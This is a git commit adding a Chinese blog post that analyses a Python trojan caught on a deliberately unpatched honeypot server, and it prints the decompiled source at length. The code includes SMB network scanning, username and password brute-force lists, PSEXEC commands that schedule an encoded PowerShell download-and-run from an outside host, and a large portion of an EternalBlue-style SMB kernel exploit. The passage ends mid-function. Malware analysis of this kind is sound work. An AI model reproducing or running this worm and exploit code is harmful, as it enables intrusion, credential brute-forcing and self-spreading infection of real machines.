summaryrefslogtreecommitdiff
path: root/_posts
diff options
context:
space:
mode:
authormayx <mayx@outlook.com>2024-11-02 13:32:13 +0100
committermayx <mayx@outlook.com>2024-11-02 13:32:13 +0100
commit3de3d63d77d38e5de14c1ed8164e7435599fe5eb (patch)
tree9156f020e0c684a8ebd185cb44184e262f930656 /_posts
parent3dab9f333a7d3e7e773f13c979841a3ce45a03a4 (diff)
Update 2 files
- /links.md - /_posts/2024-11-02-trojan.md
Diffstat (limited to '_posts')
-rw-r--r--_posts/2024-11-02-trojan.md1875
1 files changed, 1875 insertions, 0 deletions
diff --git a/_posts/2024-11-02-trojan.md b/_posts/2024-11-02-trojan.md
new file mode 100644
index 0000000..b03bbef
--- /dev/null
+++ b/_posts/2024-11-02-trojan.md
@@ -0,0 +1,1875 @@
+---
+layout: post
+title: 关于Python制作的木马探索
+tags: [Python, 木马, 病毒]
+---
+
+ 想不到木马病毒居然也可以用Python写😆<!--more-->
+
+# 起因
+ 在一年前阿里云搞了个高校学生免费领300CNY券的活动,那时候我领了一张并且零元购了一个香港的2c1g轻量服务器,在这一年里它为我做了许多,不仅当延迟极低的梯子,另外还运行着H@H给我赚Hath。一年过后的现在它马上就要过期了,当时我让我的同学也领了一张,正好等到我服务器快过期的时候买,于是我创好服务器并且把我的东西都迁过去,之后旧的服务器就没什么用了。
+ 那在它剩下的最后几天让它干些什么好呢?首先Linux系统感觉没啥意思,装个Windows玩玩吧。不过香港阿里云在装了Linux系统之后是不允许切换成Windows的,而且如果买的时候装Windows还需要额外付费,所以我用了一个[一键DD/重装脚本](https://github.com/bin456789/reinstall)把我的系统重装成Windows Server 2008。不过其实就算刷成Windows也不能改变它没啥用的事实,所以我给它设置了超简单的密码,并且没有装任何补丁,防火墙全关掉,让它在网络上成为能被随意攻破的肉鸡吧。
+ 在这之后没几天我登上去看了一眼,其实看不出来啥,毕竟就算被入侵了绝大多数情况都是被人当备用的,一般人也不会闲着把上面的文件全删掉,把系统搞崩。所以我安了个360,看看有没有中木马,结果还真中了,在Temp目录下多了个“svchost.exe”文件(虽然还有其他的木马文件但不是Python的所以不感兴趣),而且看图标居然是pyinstaller打包的!这让我有点感兴趣了,其他语言写的编译之后很难看出来什么,而且我也看不懂其他语言写的东西,但是Python我至少还是能看懂的,所以我就下载了这个样本尝试获得它的源代码。
+
+# 提取源代码
+ pyinstaller解包还是挺简单的,用[PyInstaller Extractor](https://github.com/extremecoders-re/pyinstxtractor)就可以,首先我在我的电脑上尝试解包,不过因为Python版本不对,里面的PYZ文件不能解包,并且提示我使用Python 2.7的环境再试一次。我找了台装有Python 2.7环境的服务器又执行了一次之后就全部解包完了。想不到这个木马居然没有加密😂,直接就能解压,不过就算加密了我之前看过一篇[文章](https://www.cnblogs.com/liweis/p/15891170.html)可以进行解密。
+ 不过现在得到的文件都是字节码pyc文件,还需要反编译才能看到源代码,这个步骤也很简单,安装个[uncompyle6](https://github.com/rocky/python-uncompyle6)工具就可以。它的主程序名字叫“ii.py”,于是我反编译了一下,不过看起来作者还整了一些混淆,但是极其简单,就把几个函数换成一串变量而已,所以写了个简单的脚本给它还原回去了,最终处理的结果如下(里面有个[混淆过的PowerShell版mimikatz](https://github.com/DanMcInerney/Invoke-Cats),太长了所以我给删掉了):
+```python
+# uncompyle6 version 3.9.2
+# Python bytecode version base 2.7 (62211)
+# Decompiled from: Python 2.7.18 (default, Jun 24 2022, 18:01:55)
+# [GCC 8.5.0 20210514 (Red Hat 8.5.0-13)]
+# Embedded file name: ii.py
+
+import subprocess
+import re
+import binascii
+import socket
+import struct
+import threading
+import os
+import random
+import platform
+from urllib2 import urlopen
+from json import load
+from impacket import smb, smbconnection
+from mysmb import MYSMB
+from struct import pack, unpack, unpack_from
+import sys
+import socket
+import time
+from psexec import PSEXEC
+iplist = ['192.168.0.1/24', '192.168.1.1/24', '192.168.2.1/24', '192.168.3.1/24', '192.168.4.1/24',
+ '192.168.5.1/24', '192.168.6.1/24', '192.168.7.1/24', '192.168.8.1/24', '192.168.9.1/24',
+ '192.168.10.1/24', '192.168.18.1/24', '192.168.31.1/24', '192.168.199.1/24',
+ '192.168.254.1/24', '192.168.67.1/24', '10.0.0.1/24', '10.0.1.1/24', '10.0.2.1/24',
+ '10.1.1.1/24', '10.90.90.1/24', '10.1.10.1/24', '10.10.1.1/24']
+userlist = ['', 'Administrator', 'user', 'admin', 'test', 'hp', 'guest']
+userlist2 = ['', 'Administrator', 'admin']
+passlist = ['', '123456', 'password', 'qwerty', '12345678', '123456789', '123', '1234',
+ '123123', '12345', '12345678', '123123123', '1234567890', '88888888', '111111111',
+ '000000', '111111', '112233', '123321', '654321', '666666', '888888', 'a123456',
+ '123456a', '5201314', '1qaz2wsx', '1q2w3e4r', 'qwe123', '123qwe', 'a123456789',
+ '123456789a', 'baseball', 'dragon', 'football', 'iloveyou', 'password',
+ 'sunshine', 'princess', 'welcome', 'abc123', 'monkey', '!@#$%^&*', 'charlie',
+ 'aa123456', 'Aa123456', 'admin', 'homelesspa', 'password1', '1q2w3e4r5t',
+ 'qwertyuiop', '1qaz2wsx']
+domainlist = ['']
+nip = []
+ntlist = []
+
+# remove mkatz cause it is too long(https://github.com/DanMcInerney/Invoke-Cats)
+mkatz = ''
+
+def find_ip():
+ global iplist2
+ ipconfig_process = subprocess.Popen('ipconfig /all', stdout=subprocess.PIPE)
+ output = ipconfig_process.stdout.read()
+ result = re.findall('\\b(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\b', output)
+ for ipaddr in result:
+ if ipaddr != '127.0.0.1' and ipaddr != '255.255.255.0' and ipaddr != '0.0.0.0':
+ ipaddr = ipaddr.split('.')[0] + '.' + ipaddr.split('.')[1] + '.' + ipaddr.split('.')[2] + '.1/24'
+ iplist.append(ipaddr)
+
+ netstat_process = subprocess.Popen('netstat -na', stdout=subprocess.PIPE)
+ output2 = netstat_process.stdout.read()
+ result2 = re.findall('\\b(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\b', output2)
+ for ip in result2:
+ if ip != '127.0.0.1' and ip != '0.0.0.0' and ip != '255.255.0.0' and ip != '1.1.1.1':
+ ip = ip.split('.')[0] + '.' + ip.split('.')[1] + '.' + ip.split('.')[2] + '.1/24'
+ iplist.append(ip)
+
+ try:
+ ipp1 = urlopen('http://ip.42.pl/raw', timeout=3).read()
+ ipp1 = ipp1.split('.')[0] + '.' + ipp1.split('.')[1] + '.' + ipp1.split('.')[2] + '.1/24'
+ ipp2 = load(urlopen('http://jsonip.com', timeout=3))['ip']
+ ipp2 = ipp2.split('.')[0] + '.' + ipp2.split('.')[1] + '.' + ipp2.split('.')[2] + '.1/24'
+ iplist.append(ipp1)
+ iplist.append(ipp2)
+ except:
+ pass
+
+ iplist2 = list(set(iplist))
+ iplist2.sort(key=iplist.index)
+ return iplist2
+
+
+def xip(numb):
+ del nip[:]
+ for n in xrange(numb):
+ ipp = socket.inet_ntoa(struct.pack('>I', random.randint(1, 4294967295L)))
+ ipp = ipp.split('.')[0] + '.' + ipp.split('.')[1] + '.' + ipp.split('.')[2] + '.1/24'
+ nip.append(ipp)
+
+ return nip
+
+
+def scan(ip, p):
+ global timeout
+ s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ s.settimeout(float(timeout) if timeout else None)
+ try:
+ s.connect((ip, p))
+ return 1
+ except Exception as e:
+ return 0
+
+
+def scan2(ip, p):
+ s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ s.settimeout(float(2))
+ try:
+ s.connect((ip, p))
+ return 1
+ except Exception as e:
+ return 0
+
+
+def scan3(ip, p):
+ s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ s.settimeout(float(1))
+ try:
+ s.connect((ip, p))
+ return 1
+ except Exception as e:
+ return 0
+
+
+def validate(ip, fr):
+ global dl
+ global domainlist
+ global ee2
+ global passlist
+ global userlist2
+ for u in userlist2:
+ for p in passlist:
+ if u == '' and p != '':
+ continue
+ for d in domainlist:
+ if PSEXEC(ee2, dl, 'cmd.exe /c schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\\Microsoft\\windows\\Bluetooths" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F&&c:\\windows\\temp\\svchost.exe', u, p, d, fr).run(ip):
+ print 'SMB Succ!'
+ return
+
+
+def validate2(ip, fr):
+ global ntlist
+ for u in userlist2:
+ for d in domainlist:
+ for n in ntlist:
+ if PSEXEC(ee2, dl, 'cmd.exe /c schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\\Microsoft\\windows\\Bluetooths" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F&&c:\\windows\\temp\\svchost.exe', u, '', d, fr, '00000000000000000000000000000000:' + n).run(ip):
+ print 'SMB Succ!'
+ return
+
+
+def scansmb(ip, p):
+ global semaphore1
+ if scan(ip, 445) == 1:
+ if scan(ip, 65533) == 0:
+ print 'exp IP:' + ip
+ try:
+ validate(ip, '1')
+ except:
+ pass
+
+ try:
+ check_ip(ip, 1)
+ except:
+ pass
+
+ try:
+ validate2(ip, '3')
+ except:
+ pass
+
+ semaphore1.release()
+
+
+def scansmb2(ip, p):
+ if scan2(ip, 445) == 1:
+ print 'exp IP:' + ip
+ try:
+ validate(ip, '2')
+ except:
+ pass
+
+ try:
+ check_ip(ip, 2)
+ except:
+ pass
+
+ try:
+ validate2(ip, '2')
+ except:
+ pass
+
+ semaphore1.release()
+
+
+def scansmb3(ip, p):
+ global semaphore2
+ if scan3(ip, 445) == 1:
+ if scan3(ip, 65533) == 0:
+ print 'exp IP:' + ip
+ try:
+ validate(ip, '2')
+ except:
+ pass
+
+ try:
+ check_ip(ip, 2)
+ except:
+ pass
+
+ try:
+ validate2(ip, '3')
+ except:
+ pass
+
+ semaphore2.release()
+
+
+WIN7_64_SESSION_INFO = {'SESSION_SECCTX_OFFSET': 160, 'SESSION_ISNULL_OFFSET': 186, 'FAKE_SECCTX': (pack('<IIQQIIB', 2621994, 1, 0, 0, 2, 0, 1)), 'SECCTX_SIZE': 40}
+WIN7_32_SESSION_INFO = {'SESSION_SECCTX_OFFSET': 128, 'SESSION_ISNULL_OFFSET': 150, 'FAKE_SECCTX': (pack('<IIIIIIB', 1835562, 1, 0, 0, 2, 0, 1)), 'SECCTX_SIZE': 28}
+WIN8_64_SESSION_INFO = {'SESSION_SECCTX_OFFSET': 176, 'SESSION_ISNULL_OFFSET': 202, 'FAKE_SECCTX': (pack('<IIQQQQIIB', 3670570, 1, 0, 0, 0, 0, 2, 0, 1)), 'SECCTX_SIZE': 56}
+WIN8_32_SESSION_INFO = {'SESSION_SECCTX_OFFSET': 136, 'SESSION_ISNULL_OFFSET': 158, 'FAKE_SECCTX': (pack('<IIIIIIIIB', 2359850, 1, 0, 0, 0, 0, 2, 0, 1)), 'SECCTX_SIZE': 36}
+WIN2K3_64_SESSION_INFO = {'SESSION_ISNULL_OFFSET': 186, 'SESSION_SECCTX_OFFSET': 160, 'SECCTX_PCTXTHANDLE_OFFSET': 16, 'PCTXTHANDLE_TOKEN_OFFSET': 64, 'TOKEN_USER_GROUP_CNT_OFFSET': 76, 'TOKEN_USER_GROUP_ADDR_OFFSET': 104}
+WIN2K3_32_SESSION_INFO = {'SESSION_ISNULL_OFFSET': 150, 'SESSION_SECCTX_OFFSET': 128, 'SECCTX_PCTXTHANDLE_OFFSET': 12, 'PCTXTHANDLE_TOKEN_OFFSET': 36, 'TOKEN_USER_GROUP_CNT_OFFSET': 76, 'TOKEN_USER_GROUP_ADDR_OFFSET': 104}
+WINXP_32_SESSION_INFO = {'SESSION_ISNULL_OFFSET': 148, 'SESSION_SECCTX_OFFSET': 132, 'PCTXTHANDLE_TOKEN_OFFSET': 36, 'TOKEN_USER_GROUP_CNT_OFFSET': 76, 'TOKEN_USER_GROUP_ADDR_OFFSET': 104, 'TOKEN_USER_GROUP_CNT_OFFSET_SP0_SP1': 64, 'TOKEN_USER_GROUP_ADDR_OFFSET_SP0_SP1': 92}
+WIN2K_32_SESSION_INFO = {'SESSION_ISNULL_OFFSET': 148, 'SESSION_SECCTX_OFFSET': 132, 'PCTXTHANDLE_TOKEN_OFFSET': 36, 'TOKEN_USER_GROUP_CNT_OFFSET': 60, 'TOKEN_USER_GROUP_ADDR_OFFSET': 88}
+WIN7_32_TRANS_INFO = {'TRANS_SIZE': 160, 'TRANS_FLINK_OFFSET': 24, 'TRANS_INPARAM_OFFSET': 64, 'TRANS_OUTPARAM_OFFSET': 68, 'TRANS_INDATA_OFFSET': 72, 'TRANS_OUTDATA_OFFSET': 76, 'TRANS_PARAMCNT_OFFSET': 88, 'TRANS_TOTALPARAMCNT_OFFSET': 92, 'TRANS_FUNCTION_OFFSET': 114, 'TRANS_MID_OFFSET': 128}
+WIN7_64_TRANS_INFO = {'TRANS_SIZE': 248, 'TRANS_FLINK_OFFSET': 40, 'TRANS_INPARAM_OFFSET': 112, 'TRANS_OUTPARAM_OFFSET': 120, 'TRANS_INDATA_OFFSET': 128, 'TRANS_OUTDATA_OFFSET': 136, 'TRANS_PARAMCNT_OFFSET': 152, 'TRANS_TOTALPARAMCNT_OFFSET': 156, 'TRANS_FUNCTION_OFFSET': 178, 'TRANS_MID_OFFSET': 192}
+WIN5_32_TRANS_INFO = {'TRANS_SIZE': 152, 'TRANS_FLINK_OFFSET': 24, 'TRANS_INPARAM_OFFSET': 60, 'TRANS_OUTPARAM_OFFSET': 64, 'TRANS_INDATA_OFFSET': 68, 'TRANS_OUTDATA_OFFSET': 72, 'TRANS_PARAMCNT_OFFSET': 84, 'TRANS_TOTALPARAMCNT_OFFSET': 88, 'TRANS_FUNCTION_OFFSET': 110, 'TRANS_PID_OFFSET': 120, 'TRANS_MID_OFFSET': 124}
+WIN5_64_TRANS_INFO = {'TRANS_SIZE': 224, 'TRANS_FLINK_OFFSET': 40, 'TRANS_INPARAM_OFFSET': 104, 'TRANS_OUTPARAM_OFFSET': 112, 'TRANS_INDATA_OFFSET': 120, 'TRANS_OUTDATA_OFFSET': 128, 'TRANS_PARAMCNT_OFFSET': 144, 'TRANS_TOTALPARAMCNT_OFFSET': 148, 'TRANS_FUNCTION_OFFSET': 170, 'TRANS_PID_OFFSET': 180, 'TRANS_MID_OFFSET': 184}
+X86_INFO = {'ARCH': 'x86', 'PTR_SIZE': 4, 'PTR_FMT': 'I', 'FRAG_TAG_OFFSET': 12, 'POOL_ALIGN': 8, 'SRV_BUFHDR_SIZE': 8}
+X64_INFO = {'ARCH': 'x64', 'PTR_SIZE': 8, 'PTR_FMT': 'Q', 'FRAG_TAG_OFFSET': 20, 'POOL_ALIGN': 16, 'SRV_BUFHDR_SIZE': 16}
+
+def merge_dicts(*dict_args):
+ result = {}
+ for dictionary in dict_args:
+ result.update(dictionary)
+
+ return result
+
+
+OS_ARCH_INFO = {'WIN7': {'x86': (merge_dicts(X86_INFO, WIN7_32_TRANS_INFO, WIN7_32_SESSION_INFO)), 'x64': (merge_dicts(X64_INFO, WIN7_64_TRANS_INFO, WIN7_64_SESSION_INFO))}, 'WIN8': {'x86': (merge_dicts(X86_INFO, WIN7_32_TRANS_INFO, WIN8_32_SESSION_INFO)), 'x64': (merge_dicts(X64_INFO, WIN7_64_TRANS_INFO, WIN8_64_SESSION_INFO))}, 'WINXP': {'x86': (merge_dicts(X86_INFO, WIN5_32_TRANS_INFO, WINXP_32_SESSION_INFO)), 'x64': (merge_dicts(X64_INFO, WIN5_64_TRANS_INFO, WIN2K3_64_SESSION_INFO))}, 'WIN2K3': {'x86': (merge_dicts(X86_INFO, WIN5_32_TRANS_INFO, WIN2K3_32_SESSION_INFO)), 'x64': (merge_dicts(X64_INFO, WIN5_64_TRANS_INFO, WIN2K3_64_SESSION_INFO))}, 'WIN2K': {'x86': (merge_dicts(X86_INFO, WIN5_32_TRANS_INFO, WIN2K_32_SESSION_INFO))}}
+TRANS_NAME_LEN = 4
+HEAP_HDR_SIZE = 8
+
+def calc_alloc_size(size, align_size):
+ return size + align_size - 1 & ~(align_size - 1)
+
+
+def wait_for_request_processed(conn):
+ conn.send_echo('a')
+
+
+def find_named_pipe(conn):
+ pipes = ['browser', 'spoolss', 'netlogon', 'lsarpc', 'samr']
+ tid = conn.tree_connect_andx('\\\\' + conn.get_remote_host() + '\\' + 'IPC$')
+ found_pipe = None
+ for pipe in pipes:
+ try:
+ fid = conn.nt_create_andx(tid, pipe)
+ conn.close(tid, fid)
+ found_pipe = pipe
+ break
+ except smb.SessionError as e:
+ pass
+
+ conn.disconnect_tree(tid)
+ return found_pipe
+
+
+special_mid = 0
+extra_last_mid = 0
+
+def reset_extra_mid(conn):
+ global extra_last_mid
+ global special_mid
+ special_mid = (conn.next_mid() & 65280) - 256
+ extra_last_mid = special_mid
+
+
+def next_extra_mid():
+ global extra_last_mid
+ extra_last_mid += 1
+ return extra_last_mid
+
+
+GROOM_TRANS_SIZE = 20496
+
+def leak_frag_size(conn, tid, fid):
+ info = {}
+ mid = conn.next_mid()
+ req1 = conn.create_nt_trans_packet(5, param=pack('<HH', fid, 0), mid=mid, data='A' * 4304, maxParameterCount=GROOM_TRANS_SIZE - 4304 - TRANS_NAME_LEN)
+ req2 = conn.create_nt_trans_secondary_packet(mid, data='B' * 276)
+ conn.send_raw(req1[:-8])
+ conn.send_raw(req1[-8:] + req2)
+ leakData = conn.recv_transaction_data(mid, 4580)
+ leakData = leakData[4308:]
+ if leakData[X86_INFO['FRAG_TAG_OFFSET']:X86_INFO['FRAG_TAG_OFFSET'] + 4] == 'Frag':
+ print 'Target is 32 bit'
+ info['arch'] = 'x86'
+ info['FRAG_POOL_SIZE'] = ord(leakData[X86_INFO['FRAG_TAG_OFFSET'] - 2]) * X86_INFO['POOL_ALIGN']
+ elif leakData[X64_INFO['FRAG_TAG_OFFSET']:X64_INFO['FRAG_TAG_OFFSET'] + 4] == 'Frag':
+ print 'Target is 64 bit'
+ info['arch'] = 'x64'
+ info['FRAG_POOL_SIZE'] = ord(leakData[X64_INFO['FRAG_TAG_OFFSET'] - 2]) * X64_INFO['POOL_ALIGN']
+ else:
+ print 'Not found Frag pool tag in leak data'
+ print ('Got frag size: 0x{:x}').format(info['FRAG_POOL_SIZE'])
+ return info
+
+
+def read_data(conn, info, read_addr, read_size):
+ fmt = info['PTR_FMT']
+ new_data = pack('<' + fmt * 3, info['trans2_addr'] + info['TRANS_FLINK_OFFSET'], info['trans2_addr'] + 512, read_addr)
+ new_data += pack('<II', 0, 0)
+ new_data += pack('<III', 8, 8, 8)
+ new_data += pack('<III', read_size, read_size, read_size)
+ new_data += pack('<HH', 0, 5)
+ conn.send_nt_trans_secondary(mid=info['trans1_mid'], data=new_data, dataDisplacement=info['TRANS_OUTPARAM_OFFSET'])
+ conn.send_nt_trans(5, param=pack('<HH', info['fid'], 0), totalDataCount=17120, totalParameterCount=4096)
+ conn.send_nt_trans_secondary(mid=info['trans2_mid'])
+ read_data = conn.recv_transaction_data(info['trans2_mid'], 8 + read_size)
+ info['trans2_addr'] = unpack_from('<' + fmt, read_data)[0] - info['TRANS_FLINK_OFFSET']
+ conn.send_nt_trans_secondary(mid=info['trans1_mid'], param=pack('<' + fmt, info['trans2_addr']), paramDisplacement=info['TRANS_INDATA_OFFSET'])
+ wait_for_request_processed(conn)
+ conn.send_nt_trans_secondary(mid=info['trans1_mid'], data=pack('<H', info['trans2_mid']), dataDisplacement=info['TRANS_MID_OFFSET'])
+ wait_for_request_processed(conn)
+ return read_data[8:]
+
+
+def write_data(conn, info, write_addr, write_data):
+ conn.send_nt_trans_secondary(mid=info['trans1_mid'], data=pack('<' + info['PTR_FMT'], write_addr), dataDisplacement=info['TRANS_INDATA_OFFSET'])
+ wait_for_request_processed(conn)
+ conn.send_nt_trans_secondary(mid=info['trans2_mid'], data=write_data)
+ wait_for_request_processed(conn)
+
+
+def align_transaction_and_leak(conn, tid, fid, info, numFill=4):
+ trans_param = pack('<HH', fid, 0)
+ for i in range(numFill):
+ conn.send_nt_trans(5, param=trans_param, totalDataCount=4304, maxParameterCount=GROOM_TRANS_SIZE - 4304)
+
+ mid_ntrename = conn.next_mid()
+ req1 = conn.create_nt_trans_packet(5, param=trans_param, mid=mid_ntrename, data='A' * 4304, maxParameterCount=info['GROOM_DATA_SIZE'] - 4304)
+ req2 = conn.create_nt_trans_secondary_packet(mid_ntrename, data='B' * 276)
+ req3 = conn.create_nt_trans_packet(5, param=trans_param, mid=fid, totalDataCount=info['GROOM_DATA_SIZE'] - 4096, maxParameterCount=4096)
+ reqs = []
+ for i in range(12):
+ mid = next_extra_mid()
+ reqs.append(conn.create_trans_packet('', mid=mid, param=trans_param, totalDataCount=info['BRIDE_DATA_SIZE'] - 512, totalParameterCount=512, maxDataCount=0, maxParameterCount=0))
+
+ conn.send_raw(req1[:-8])
+ conn.send_raw(req1[-8:] + req2 + req3 + ('').join(reqs))
+ leakData = conn.recv_transaction_data(mid_ntrename, 4580)
+ leakData = leakData[4308:]
+ if leakData[info['FRAG_TAG_OFFSET']:info['FRAG_TAG_OFFSET'] + 4] != 'Frag':
+ print 'Not found Frag pool tag in leak data'
+ return None
+ leakData = leakData[info['FRAG_TAG_OFFSET'] - 4 + info['FRAG_POOL_SIZE']:]
+ expected_size = pack('<H', info['BRIDE_TRANS_SIZE'])
+ leakTransOffset = info['POOL_ALIGN'] + info['SRV_BUFHDR_SIZE']
+ if leakData[4:8] != 'LStr' or leakData[info['POOL_ALIGN']:info['POOL_ALIGN'] + 2] != expected_size or leakData[leakTransOffset + 2:leakTransOffset + 4] != expected_size:
+ print 'No transaction struct in leak data'
+ return None
+ leakTrans = leakData[leakTransOffset:]
+ ptrf = info['PTR_FMT']
+ _, connection_addr, session_addr, treeconnect_addr, flink_value = unpack_from('<' + ptrf * 5, leakTrans, 8)
+ inparam_value = unpack_from('<' + ptrf, leakTrans, info['TRANS_INPARAM_OFFSET'])[0]
+ leak_mid = unpack_from('<H', leakTrans, info['TRANS_MID_OFFSET'])[0]
+ print ('CONNECTION: 0x{:x}').format(connection_addr)
+ print ('SESSION: 0x{:x}').format(session_addr)
+ print ('FLINK: 0x{:x}').format(flink_value)
+ print ('InParam: 0x{:x}').format(inparam_value)
+ print ('MID: 0x{:x}').format(leak_mid)
+ next_page_addr = (inparam_value & 18446744073709547520L) + 4096
+ if next_page_addr + info['GROOM_POOL_SIZE'] + info['FRAG_POOL_SIZE'] + info['POOL_ALIGN'] + info['SRV_BUFHDR_SIZE'] + info['TRANS_FLINK_OFFSET'] != flink_value:
+ print ('unexpected alignment, diff: 0x{:x}').format(flink_value - next_page_addr)
+ return None
+ return {'connection': connection_addr, 'session': session_addr, 'next_page_addr': next_page_addr, 'trans1_mid': leak_mid, 'trans1_addr': (inparam_value - info['TRANS_SIZE'] - TRANS_NAME_LEN), 'trans2_addr': (flink_value - info['TRANS_FLINK_OFFSET'])}
+
+
+def exploit_matched_pairs(conn, pipe_name, info):
+ tid = conn.tree_connect_andx('\\\\' + conn.get_remote_host() + '\\' + 'IPC$')
+ conn.set_default_tid(tid)
+ fid = conn.nt_create_andx(tid, pipe_name)
+ info.update(leak_frag_size(conn, tid, fid))
+ info.update(OS_ARCH_INFO[info['os']][info['arch']])
+ info['GROOM_POOL_SIZE'] = calc_alloc_size(GROOM_TRANS_SIZE + info['SRV_BUFHDR_SIZE'] + info['POOL_ALIGN'], info['POOL_ALIGN'])
+ print ('GROOM_POOL_SIZE: 0x{:x}').format(info['GROOM_POOL_SIZE'])
+ info['GROOM_DATA_SIZE'] = GROOM_TRANS_SIZE - TRANS_NAME_LEN - 4 - info['TRANS_SIZE']
+ bridePoolSize = 4096 - (info['GROOM_POOL_SIZE'] & 4095) - info['FRAG_POOL_SIZE']
+ info['BRIDE_TRANS_SIZE'] = bridePoolSize - (info['SRV_BUFHDR_SIZE'] + info['POOL_ALIGN'])
+ print ('BRIDE_TRANS_SIZE: 0x{:x}').format(info['BRIDE_TRANS_SIZE'])
+ info['BRIDE_DATA_SIZE'] = info['BRIDE_TRANS_SIZE'] - TRANS_NAME_LEN - info['TRANS_SIZE']
+ leakInfo = None
+ for i in range(10):
+ reset_extra_mid(conn)
+ leakInfo = align_transaction_and_leak(conn, tid, fid, info)
+ if leakInfo is not None:
+ break
+ print 'leak failed... try again'
+ conn.close(tid, fid)
+ conn.disconnect_tree(tid)
+ tid = conn.tree_connect_andx('\\\\' + conn.get_remote_host() + '\\' + 'IPC$')
+ conn.set_default_tid(tid)
+ fid = conn.nt_create_andx(tid, pipe_name)
+
+ if leakInfo is None:
+ return False
+ info['fid'] = fid
+ info.update(leakInfo)
+ shift_indata_byte = 512
+ conn.do_write_andx_raw_pipe(fid, 'A' * shift_indata_byte)
+ indata_value = info['next_page_addr'] + info['TRANS_SIZE'] + 8 + info['SRV_BUFHDR_SIZE'] + 4096 + shift_indata_byte
+ indata_next_trans_displacement = info['trans2_addr'] - indata_value
+ conn.send_nt_trans_secondary(mid=fid, data='\x00', dataDisplacement=indata_next_trans_displacement + info['TRANS_MID_OFFSET'])
+ wait_for_request_processed(conn)
+ recvPkt = conn.send_nt_trans(5, mid=special_mid, param=pack('<HH', fid, 0), data='')
+ if recvPkt.getNTStatus() != 65538:
+ print ('unexpected return status: 0x{:x}').format(recvPkt.getNTStatus())
+ print '!!! Write to wrong place !!!'
+ print 'the target might be crashed'
+ return False
+ print 'success controlling groom transaction'
+ print 'modify trans1 struct for arbitrary read/write'
+ fmt = info['PTR_FMT']
+ conn.send_nt_trans_secondary(mid=fid, data=pack('<' + fmt, info['trans1_addr']), dataDisplacement=indata_next_trans_displacement + info['TRANS_INDATA_OFFSET'])
+ wait_for_request_processed(conn)
+ conn.send_nt_trans_secondary(mid=special_mid, data=pack('<' + fmt * 3, info['trans1_addr'], info['trans1_addr'] + 512, info['trans2_addr']), dataDisplacement=info['TRANS_INPARAM_OFFSET'])
+ wait_for_request_processed(conn)
+ info['trans2_mid'] = conn.next_mid()
+ conn.send_nt_trans_secondary(mid=info['trans1_mid'], data=pack('<H', info['trans2_mid']), dataDisplacement=info['TRANS_MID_OFFSET'])
+ return True
+
+
+def exploit_fish_barrel(conn, pipe_name, info):
+ tid = conn.tree_connect_andx('\\\\' + conn.get_remote_host() + '\\' + 'IPC$')
+ conn.set_default_tid(tid)
+ fid = conn.nt_create_andx(tid, pipe_name)
+ info['fid'] = fid
+ if info['os'] == 'WIN7' and 'arch' not in info:
+ info.update(leak_frag_size(conn, tid, fid))
+ if 'arch' in info:
+ info.update(OS_ARCH_INFO[info['os']][info['arch']])
+ attempt_list = [OS_ARCH_INFO[info['os']][info['arch']]]
+ else:
+ attempt_list = [
+ OS_ARCH_INFO[info['os']]['x64'], OS_ARCH_INFO[info['os']]['x86']]
+ print 'Groom packets'
+ trans_param = pack('<HH', info['fid'], 0)
+ for i in range(12):
+ mid = info['fid'] if i == 8 else next_extra_mid()
+ conn.send_trans('', mid=mid, param=trans_param, totalParameterCount=256 - TRANS_NAME_LEN, totalDataCount=3776, maxParameterCount=64, maxDataCount=0)
+
+ shift_indata_byte = 512
+ conn.do_write_andx_raw_pipe(info['fid'], 'A' * shift_indata_byte)
+ success = False
+ for tinfo in attempt_list:
+ print 'attempt controlling next transaction on ' + tinfo['ARCH']
+ HEAP_CHUNK_PAD_SIZE = (tinfo['POOL_ALIGN'] - (tinfo['TRANS_SIZE'] + HEAP_HDR_SIZE) % tinfo['POOL_ALIGN']) % tinfo['POOL_ALIGN']
+ NEXT_TRANS_OFFSET = 3840 - shift_indata_byte + HEAP_CHUNK_PAD_SIZE + HEAP_HDR_SIZE
+ conn.send_trans_secondary(mid=info['fid'], data='\x00', dataDisplacement=NEXT_TRANS_OFFSET + tinfo['TRANS_MID_OFFSET'])
+ wait_for_request_processed(conn)
+ recvPkt = conn.send_nt_trans(5, mid=special_mid, param=trans_param, data='')
+ if recvPkt.getNTStatus() == 65538:
+ print 'success controlling one transaction'
+ success = True
+ if 'arch' not in info:
+ print 'Target is ' + tinfo['ARCH']
+ info['arch'] = tinfo['ARCH']
+ info.update(OS_ARCH_INFO[info['os']][info['arch']])
+ break
+ if recvPkt.getNTStatus() != 0:
+ print ('unexpected return status: 0x{:x}').format(recvPkt.getNTStatus())
+
+ if not success:
+ print ('unexpected return status: 0x{:x}').format(recvPkt.getNTStatus())
+ print '!!! Write to wrong place !!!'
+ print 'the target might be crashed'
+ return False
+ print 'modify parameter count to 0xffffffff to be able to write backward'
+ conn.send_trans_secondary(mid=info['fid'], data='\xff\xff\xff\xff', dataDisplacement=NEXT_TRANS_OFFSET + info['TRANS_TOTALPARAMCNT_OFFSET'])
+ if info['arch'] == 'x64':
